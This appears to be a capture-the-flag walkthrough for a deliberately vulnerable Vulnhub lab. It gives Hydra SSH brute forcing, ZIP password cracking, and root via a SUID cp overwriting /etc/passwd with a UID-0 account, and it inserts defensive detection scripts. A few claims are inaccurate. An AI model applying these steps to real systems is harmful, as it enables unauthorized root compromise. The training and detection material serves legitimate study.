
Gears of War: EP#1 Vulnhub Walkthrough

Gears of War: EP#1 is a VM made by eDu809. It is a purposely built vulnerable lab intended to give experience in the world of penetration testing. It is of intermediate difficulty and is very handy for brushing up your skills as a penetration tester. The ultimate goal of this challenge is to get root and read the root flag.

Level: Intermediate

These labs are available on the Vulnhub website; we will download the lab file from this link.

Penetration Testing Methodology

Network Scanning

  • Netdiscover
  • Nmap Port Scan

Enumeration

  • Browsing HTTP Service
  • SMB Login

Exploiting

  • Using Crunch to generate a wordlist
  • Using fcrackzip to brute-force the ZIP file password
  • Using Hydra to brute-force the SSH login

Privilege Escalation

  • Reading the /etc/passwd file
  • Finding SUID bit files
  • Using OpenSSL to generate a password hash
  • Adding a user entry to the passwd file in /tmp
  • Reading the final flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.

netdiscover

We found the target IP Address 192.168.1.184. Let’s begin with basic port scanning with NMAP.

nmap -A -p- 192.168.1.184

Enumeration

For more details, we need to enumerate the host further. Since port 80 is open, we start by exploring the HTTP service in a web browser.

The HTTP service was not much help. The nmap scan, on the other hand, clearly shows SMB running, and since we have no credentials for SSH we went straight to SMB. We listed the shares with the command below and got a list of shared directories. We accessed the LOCUS_LAN$ share and enumerated it, finding an SOS.txt file and an msg_horda.zip file. Let's transfer these files to our machine to read their contents.

smbclient -L 192.168.1.184
smbclient //192.168.1.184/LOCUS_LAN$
get msg_horda.zip
get SOS.txt
ls

We tried opening the msg_horda.zip file, but it is password protected.

Reading the SOS.txt file, however, was a success: it gave us a hint about the characters of the ZIP file's password.

Exploiting

It's time to FIRE UP!! Crunch and generate a wordlist matching the password pattern we fetched from the SOS.txt file. In crunch's -t pattern, @ stands for a lowercase letter, % for a digit and , for an uppercase letter, so @%%, produces every lowercase-digit-digit-uppercase combination.

crunch 4 4 -t @%%, -o wordlist

Once the wordlist is ready, we use fcrackzip to crack the ZIP file password as shown below.

fcrackzip -D -u -v -p wordlist msg_horda.zip

The password for the ZIP file is r44M. We also found a key.txt file inside the ZIP file.

After reading the key.txt file, we got another credential, which could be useful for SSH login, but we still need a username. Bring up Hydra.

We brute-forced the username for the SSH login using Hydra with the password 3_d4y.

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y -t 4 192.168.1.184 ssh

After successfully logging in over SSH, we tried enumerating the /etc directory but couldn't, because user marcus doesn't have the privileges to access the /etc directory.

ssh marcus@192.168.1.184
id
cd /etc
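Seen from the defender's side, the Hydra run above is a one-password, many-usernames spray against sshd. The following added example (not from the walkthrough) flags that pattern in auth.log; the log lines, hostname, PIDs and addresses are constructed.

```shell
#!/bin/sh
# Added example, not part of the walkthrough: detect the pattern the hydra -L run
# above leaves in sshd logs, one fixed password tried against many usernames from
# a single source. Assumes stock OpenSSH "Failed password" log lines and awk.

# detect_ssh_spray LOGFILE THRESHOLD
# Prints "IP distinct_users total_failures" for every source address that failed
# to log in as at least THRESHOLD different usernames.
detect_ssh_spray() {
    awk -v thr="$2" '
        /sshd\[[0-9]+\]: Failed password for/ {
            user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                # "for invalid user NAME" (unknown account) or "for NAME" (known one)
                if ($i == "for") user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if (user == "" || ip == "") next
            fails[ip]++
            if (!seen[ip, user]++) distinct[ip]++
        }
        END {
            for (ip in distinct)
                if (distinct[ip] >= thr) print ip, distinct[ip], fails[ip]
        }
    ' "$1"
}

# Constructed sample log: 192.168.1.50 cycles through usernames with one password
# (the hydra run); 192.168.1.20 is a single user who mistyped twice and must not
# be flagged. Hostname, PIDs and addresses are made up.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Nov 15 23:41:01 gears sshd[2210]: Failed password for invalid user admin from 192.168.1.50 port 51000 ssh2
Nov 15 23:41:01 gears sshd[2212]: Failed password for invalid user guest from 192.168.1.50 port 51001 ssh2
Nov 15 23:41:02 gears sshd[2214]: Failed password for invalid user test from 192.168.1.50 port 51002 ssh2
Nov 15 23:41:02 gears sshd[2216]: Failed password for marcus from 192.168.1.50 port 51003 ssh2
Nov 15 23:41:05 gears sshd[2220]: Accepted password for marcus from 192.168.1.50 port 51004 ssh2
Nov 15 23:45:10 gears sshd[2300]: Failed password for marcus from 192.168.1.20 port 40000 ssh2
Nov 15 23:45:15 gears sshd[2302]: Failed password for marcus from 192.168.1.20 port 40001 ssh2
EOF

# Flag any source that tried three or more distinct usernames.
detect_ssh_spray "$SAMPLE_LOG" 3
```

A successful "Accepted password" right after the spray, as in the sample, is the line to pivot on next, since it tells you which guessed account actually worked.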

Privilege Escalation

Since our target machine gives us a bash shell, we use ssh -t to force TTY allocation and start bash without its profile. This will help us run commands as an administrator. Finally, we are able to access the /etc directory.

ssh marcus@192.168.1.184 -t "bash --noprofile"
cd /etc
pwd

Reading the passwd file was not much help by itself, but it gave us an idea of what to do next.

cat passwd

On checking for SUID bit files under the /bin directory, we found that cp has the SUID bit set, meaning the current user can run it with the file owner's privileges. This is going to be interesting.

find /bin -type f -perm -u=s 2>/dev/null

Without any further waiting, we need a password hash for the user we are going to create on the target machine by adding an entry to the /etc/passwd file. We use OpenSSL to generate a salted hash.

openssl passwd -1 -salt raj pass123

Now back to our user marcus on the target machine. Here we use the hash generated in the previous step to create a user raj with elevated privileges. We use nano to make the entry in a passwd file in the /tmp directory, and after making the entry we check it with the tail command.

cd /tmp
nano passwd
cat passwd | tail

Now all we have to do is log in with the username and password we just created to get our root shell. On enumeration we found flag.txt.

su raj
whoami
cd /root
ls -al
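The escalation above leaves two artifacts a defender can look for: a SUID bit on cp and a UID-0 entry with an inline hash in /etc/passwd. The following added example (not from the walkthrough) audits for both against constructed inputs; the hash value is a placeholder.

```shell
#!/bin/sh
# Added example, not part of the walkthrough: the two checks a defender runs
# against the escalation path above, an unexpected SUID bit on cp and a
# hand-written UID-0 entry in /etc/passwd. Assumes POSIX sh, awk, find, sort
# and comm; all inputs below are constructed.

# audit_passwd FILE
# Flags malformed lines, extra UID-0 accounts, empty password fields and
# entries carrying a hash in passwd itself (a shadowed system keeps "x" there
# and the real hash in /etc/shadow, which only root can read).
audit_passwd() {
    awk -F: '
        NF != 7                  { print "malformed line: " $0; next }
        $3 == 0 && $1 != "root"  { print "extra uid-0 account: " $1 }
        $2 == ""                 { print "empty password field: " $1; next }
        $2 != "x" && $2 != "*" && $2 != "!" { print "hash stored in passwd: " $1 }
    ' "$1"
}

# unexpected_suid ROOT BASELINE
# Lists SUID executables under ROOT that are absent from BASELINE, a sorted
# file of paths recorded with the same find on a known-good install.
unexpected_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort | comm -23 - "$2"
}

# Constructed passwd in the state the walkthrough leaves it: "raj" appended
# with UID 0 and a hash in the password field (placeholder hash, not a real one).
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/bash
raj:$1$raj$PLACEHOLDERHASH0000000:0:0:raj:/root:/bin/bash
EOF

# Constructed filesystem: su is SUID and expected, cp is SUID and is not.
SAMPLE_ROOT=$(mktemp -d)
BASELINE=$(mktemp)
trap 'rm -rf "$SAMPLE_PASSWD" "$SAMPLE_ROOT" "$BASELINE"' EXIT
mkdir "$SAMPLE_ROOT/bin"
for f in su cp ls; do printf '#!/bin/sh\n' > "$SAMPLE_ROOT/bin/$f"; done
chmod 4755 "$SAMPLE_ROOT/bin/su" "$SAMPLE_ROOT/bin/cp"
printf '%s\n' "$SAMPLE_ROOT/bin/su" > "$BASELINE"

audit_passwd "$SAMPLE_PASSWD"
unexpected_suid "$SAMPLE_ROOT" "$BASELINE"
```

On a real host, run unexpected_suid against / with a baseline captured from a clean build, and feed audit_passwd the live /etc/passwd from a cron job or file-integrity monitor.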

Time to Read our Final Flag!!

cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 3 years in the field of security as a Penetration Tester and Security Analyst.

5 thoughts on “Gears of War: EP#1 Vulnhub Walkthrough”

  1. nmap -A -p 43.255.154.125

    By using this first command….

    root@Ganakshya:~# nmap -A -p 43.255.154.125
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 23:41 EST
    Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-”
    QUITTING!

    Coming like this….
    What to do sir…..?

    1. Hello Ganapathi,

      Your command line is wrong at the port part.

      Try:

      nmap -A -p- IPNUMBER
      like:
      nmap -A -p- 192.168.100.60

      or

      nmap -A -p PORTNUMBER IPNUMBER
      like:
      nmap -A -p 80 192.168.100.60

    2. Hey,
      just give a space in front of -p.
      As you are not giving a space, it looks like you are giving 43.255.154.125 as a port number, and unfortunately there is no port like that.
      It's taking your IP as a port number.
      Giving a space will solve your problem.
      Peace.

  2. Hi,
    I get stuck at creating the user.
    I don't know what to do in
    cd /tmp. I did nano passwd and put my password hash, but when I write
    su myname it says no passwd entry for user! Can you tell me how to make it right please? Thanks.

    1. Hello Mike
      They forgot 1 step:
      go to /tmp and do following:

      cp passwd /etc/

      You need to copy the passwd file you created to the /etc/passwd folder.

      Then you can switch to root user.
